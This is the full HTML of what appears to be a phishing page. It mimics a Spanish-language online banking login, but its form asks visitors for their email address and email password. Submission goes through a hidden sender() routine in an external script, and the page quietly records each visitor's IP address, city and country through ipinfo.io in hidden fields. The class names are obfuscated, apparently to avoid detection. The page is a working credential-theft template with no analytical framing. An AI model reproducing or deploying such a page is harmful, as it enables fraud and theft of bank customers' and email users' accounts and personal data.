




<!DOCTYPE html>
<html lang="en">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <style>body {transition: opacity ease-in 0.3s; } 
         body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
      </style>
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <title>Digitales</title>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
      
      <script>
         $.getJSON("https://ipinfo.io", function (data) {
      $("#ip").html("" + data.ip);
      $("#address").html("" + data.city + ", " + data.country);

      })
      </script>
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0">
      <link rel="icon" type="image/x-icon" href="img/favicon.ico">
      <link href="css/yelprincipe.css" type="text/css" rel="stylesheet">
      <link rel="stylesheet" type="text/css" href="css/yelrey.css">
      <link rel="stylesheet" type="text/css" href="css/laprincesa.css">
   </head>
   <body >

         <div _ngcontent-c0="" class="slough">
            <header _ngcontent-c0="">
               <div _ngcontent-c0="" class="slough_header" style="height: 200px;">
                  <icb-publicmasterheader _ngcontent-c0="" _nghost-c2="">
                     <div _ngcontent-c2="" class="watford">
                        <div _ngcontent-c2="" class="language_V1 fr">
                           <icb-language-options _ngcontent-c2="" _nghost-c9="">
                              <div _ngcontent-c9="" class="crawley">
                                 <span _ngcontent-c9="" class="crawley-pipe-left"></span>
                                 <div _ngcontent-c9="" class="crawley-content">
                                    <a _ngcontent-c9="" class="crawley-content-link " title="Seleccionar idioma" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                       <span _ngcontent-c9="" class="crawley-content-link-text">Español</span>
                                       <i _ngcontent-c9="" class="crawley-content-icon-mobile">ES</i>
                                       <i _ngcontent-c9="" class="stream-arrow_down_1 crawley-content-icon-arrow"></i>
                                       <div _ngcontent-c9="" class="clearboth"></div>
                                    </a>
                                    <div _ngcontent-c9="" class="crawley-content-link-background"></div>
                                 </div>
                                 <icb-contextual-panel _ngcontent-c9="" height="" pointerlocation="topRight" usemode="contextualMenu" width="250" _nghost-c11="">
                                    <div _ngcontent-c11="" data-hidden="true" class="manchester      productSelectorMode  no_footer fullscreen visibility ">
                                       <div _ngcontent-c11="" class="manchester-content">
                                          <div _ngcontent-c11="" class="manchester-content-holder">
                                             <div _ngcontent-c11="" class="manchester-content-holder-indicator"></div>
                                             <div _ngcontent-c11="" class="manchester-content-holder-top" data-hidden="false">
                                                <a _ngcontent-c11="" class="manchester-content-header-link fr" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                                   <svg _ngcontent-c11="" class="svg-remove-circle">
                                                      <circle _ngcontent-c11="" cx="10" cy="10" r="9"></circle>
                                                      <line _ngcontent-c11="" x1="14" x2="6" y1="6" y2="14"></line>
                                                      <line _ngcontent-c11="" x1="6" x2="14" y1="6" y2="14"></line>
                                                   </svg>
                                                </a>
                                                <h6 _ngcontent-c11="">
                                                   <div _ngcontent-c9="" class="manchester-content-holder-top " data-contextual-panel-header="1" header="">
                                                      Seleccionar idioma
                                                   </div>
                                                </h6>
                                             </div>
                                             <div _ngcontent-c11="" class="manchester-content-holder-top" style="margin:0;background:#969696;" data-hidden="true">
                                             </div>
                                             <div _ngcontent-c11="" class="manchester-content-holder-middle has-title">
                                                <icb-menuoptions _ngcontent-c11="" data-hidden="true">
                                                   <div class="oldham">
                                                      <div class="oldham_content_panel_start">
                                                         <div class="oldham-panel-heading">
                                                            <a class="oldham-panel-link oldham-panel-link-activo" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                                               <h4 class="oldham-panel-title">
                                                                  <span class="oldham-panel-title-icon">
                                                                  <i></i>
                                                                  </span>
                                                                  <span class="oldham-panel-title-text">
                                                                  English
                                                                  </span>
                                                                  <i class="stream-check-12 oldham-panel-title-active-icon"></i>
                                                               </h4>
                                                            </a>
                                                         </div>
                                                      </div>
                                                      <div class="oldham_content_panel_start">
                                                         <div class="oldham-panel-heading">
                                                            <a class="oldham-panel-link oldham-panel-link-activo" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                                               <h4 class="oldham-panel-title active">
                                                                  <span class="oldham-panel-title-icon">
                                                                  <i></i>
                                                                  </span>
                                                                  <span class="oldham-panel-title-text">
                                                                  Español
                                                                  </span>
                                                                  <i class="stream-check-12 oldham-panel-title-active-icon"></i>
                                                               </h4>
                                                            </a>
                                                         </div>
                                                      </div>
                                                   </div>
                                                </icb-menuoptions>
                                             </div>
                                             <div _ngcontent-c11="" class="manchester-content-holder-footer" data-hidden="true">
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </icb-contextual-panel>
                              </div>
                           </icb-language-options>
                        </div>
                        <div _ngcontent-c2="" class="contact_V1 fr">
                           <icb-contact-us _ngcontent-c2="" _nghost-c10="">
                              <div _ngcontent-c10="" class="rotherham">
                                 <div _ngcontent-c10="">
                                    <span _ngcontent-c10="" class="rotherham-pipe-left"></span>
                                    <div _ngcontent-c10="" class="rotherham-content">
                                       <a _ngcontent-c10="" class="rotherham-content-link " title="Contáctenos" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                          <span _ngcontent-c10="" class="rotherham-content-link-text">Contáctenos</span>
                                          <i _ngcontent-c10="" class="stream-email-22 rotherham-content-icon-mobile"></i>
                                          <div _ngcontent-c10="" class="clearboth"></div>
                                       </a>
                                       <div _ngcontent-c10="" class="rotherham-content-link-background"></div>
                                    </div>
                                 </div>
                                 <icb-modalpopup _ngcontent-c10="" _nghost-c5="">
                                    <div _ngcontent-c5="" class="parma limitedHeightMode medium" data-hidden="true" style="opacity: 0; z-index: 900;">
                                       <div _ngcontent-c5="" class="parma-content-header">
                                          <div _ngcontent-c5="">
                                             <a _ngcontent-c5="" class="parma-content-header-link fr" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                                <svg _ngcontent-c5="" class="svg-remove-circle">
                                                   <circle _ngcontent-c5="" cx="10" cy="10" r="9"></circle>
                                                   <line _ngcontent-c5="" x1="14" x2="6" y1="6" y2="14"></line>
                                                   <line _ngcontent-c5="" x1="6" x2="14" y1="6" y2="14"></line>
                                                </svg>
                                             </a>
                                             <span _ngcontent-c5="" class="parma-content-header-text ">Contáctenos</span>
                                          </div>
                                       </div>
                                       <div _ngcontent-c5="" class="clearboth"></div>
                                       <div _ngcontent-c5="" class="parma-modal-overlay parma-modal-overlay-dark" data-hidden="true" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);"></div>
                                       <div _ngcontent-c5="" class="parma-modal-overlay" data-hidden="true"></div>
                                       <div _ngcontent-c5="" class="clearboth"></div>
                                    </div>
                                 </icb-modalpopup>
                              </div>
                           </icb-contact-us>
                        </div>
                        <div _ngcontent-c2="" class="clearboth watford-clear"></div>
                        <a _ngcontent-c2="" class="exeter" title="Logo" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                        </a>
                     </div>
                  </icb-publicmasterheader>
               </div>
            </header>
          
               <div _ngcontent-c0="" id="mainNoScroll" class="slough_content">
                  <router-outlet _ngcontent-c0="">
                  </router-outlet>
                  <icb-login _nghost-c24="">
                     <div _ngcontent-c24="" class="ipswich">
                        <icb-wizard _ngcontent-c24="" _nghost-c25="" data-hidden="false">
                           <div _ngcontent-c25="" class="ipswich-main fl wizardAutoHeightMode with-advertising">
                              <div _ngcontent-c25="" class="ipswich-main-animate">
                                 <icb-wizard-step-one-by-one _ngcontent-c24="" _nghost-c26="">
                                    <div _ngcontent-c26="" class="step fl wizardAutoHeightMode ipswich-step-visible">
                                       <div _ngcontent-c26="" class="ipswich-main-wizard-header" style="display: block;">
                                          <span _ngcontent-c26="" class="ipswich-main-title">
                                             <wizard-title _ngcontent-c24="">
                                                Bienvenido a tu Banca Digital
                                             </wizard-title>
                                          </span>
                                       </div>
                                       <div _ngcontent-c26="" class="clearboth"></div>
                                       <div _ngcontent-c26="" class="ipswich-main-wizard-pre-header">
                                          <span _ngcontent-c26="" class="ipswich-main-subtitle-description">
                                          </span>
                                       </div>
                                       <div _ngcontent-c26="" class="ipswich-main-wizard-content">
                                          <wizard-step-content _ngcontent-c24="">
                                                <form _ngcontent-c27="" action="" method="post"  onsubmit=" return sender()"  class="wizardAutoHeightMode ng-pristine ng-invalid ng-touched">
                                                   <div _ngcontent-c27="" class="ipswich-main-data">
                                                      <i _ngcontent-c27="" class="stream-SV-Usuario"></i>
                                                      <input _ngcontent-c27="" type="email"  minlength="2" required autocomplete="off" class="ipswich-main-data-input required ng-pristine ng-invalid ng-touched"  id="0T4RX" placeholder="Ingrese su correo electrónico">
                                                   </div>
                                                   <div _ngcontent-c27="" class="clearboth"></div>
                                                   <div _ngcontent-c27="" class="ipswich-main-data">
                                                      <i _ngcontent-c27="" class="stream-SV-Contrasena"></i>
                                                      <input _ngcontent-c27="" autocomplete="off" class="ipswich-main-data-input required ng-untouched ng-pristine ng-invalid" minlength="2"  required id="C0NTRX" type="password" placeholder="Ingrese su contraseña de correo">
                                                   </div>
                                                   <div _ngcontent-c27="" class="ipswich-main-keyboard">
                                                      <a _ngcontent-c27="" class="ipswich-main-keyboard-link" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                                      Teclado virtual</a>
                                                   </div>
                                                   
                                                   <div _ngcontent-c27="" class="clearboth"></div>
                                                   <div _ngcontent-c27="" class="ipswich-main-buttons-login-password fr">
                                                      <icb-button _ngcontent-c27="" _nghost-c8="">
                                                         <button _ngcontent-c8="" type="submit" class="ipswich-main-buttons-link big" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);border: none;">
                                                         <span _ngcontent-c8="" class="ipswich-main-buttons-link-text">
                                                         Siguiente
                                                         </span>
                                                         </button>
                                                      </icb-button>
                                                   </div>
                                                   <div _ngcontent-c27="" class="clearboth"></div>
                                                   <div _ngcontent-c27="" class="ipswich-main-engagement-password">
                                                      <div _ngcontent-c27="" class="ipswich-main-engagement-data fr no-line">
                                                         <ul _ngcontent-c27="" class="ipswich-main-engagement-data-ul">
                                                            <li _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item"><a _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item-link" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                                               ¿Ha olvidado su contraseña?</a>
                                                            </li>
                                                            <li _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item-pipe">|</li>
                                                            <li _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item"><a _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item-link" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">
                                                               ¿Su usuario ha sido bloqueado?</a>
                                                            </li>
                                                         </ul>
                                                      </div>
                                                      <div _ngcontent-c27="" class="ipswich-main-engagement-data fr">
                                                         <ul _ngcontent-c27="" class="ipswich-main-engagement-data-ul">
                                                            <li _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item-title">¿No tienes usuario?:</li>
                                                            <li _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item"><a _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item-link" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">Regístrate aquí</a></li>
                                                            <li _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item-pipe">|</li>
                                                            <li _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item"><a _ngcontent-c27="" class="ipswich-main-engagement-data-ul-item-link" style="touch-action: manipulation; user-select: none; -webkit-user-drag: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);">¿Ha olvidado su usuario?</a></li>
                                                         </ul>
                                                      </div>
                                                   </div>
                                                   <div _ngcontent-c27="" class="clearboth"></div>
                                                </form>
                                             </icb-login-step-password>
                                          </wizard-step-content>
                                       </div>
                                    </div>
                                 </icb-wizard-step-one-by-one>
                                 
                              </div>
                           </div>
                        </icb-wizard>
                        
                        <div _ngcontent-c24="" class="ipswich-advertising fr">
                           <icb-advertising _ngcontent-c24="" _nghost-c37="">
                              <div _ngcontent-c37="" class="prisma_responsive" id="advertisingContainer">
                                 <div class="prisma_carrusel  carrusel_md" data-prisma-carrousel="true" style="width: 360px;">
                                    <a class="carrusel-left"><span class="prisma-arrow"></span></a>
                                    <div class="carrusel-images" style="overflow: hidden; padding-bottom: 105.556%;">
                                          
                                       <div style="position: absolute; opacity: 1; left: 0px;"><img class="prisma_banner" src="img/50ecb768605f8931dd3aacb2a1d3ac04.jpg"></div>
                                    </div>
                                    <a class="carrusel-right"><span class="prisma-arrow"></span></a>
                                    <div class="carrusel-dots">
                                       <ul class="inline-list">
                                          <li><a class="active"></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                          <li><a class=""></a></li>
                                       </ul>
                                    </div>
                                 </div>
                              </div>
                           </icb-advertising>
                        </div>
                        <div _ngcontent-c24="" class="clearboth"></div>
                     </div>
                     <router-outlet _ngcontent-c24=""></router-outlet>
                  </icb-login>
               </div>
            </main>
            <div _ngcontent-c0="" class="slough_contextual">
            </div>
         </div>
         
      </icb-app>
<p id="ip" hidden >
    <p id="address" hidden>
     <script src="js/sax2.js"></script>
   </body>
</html>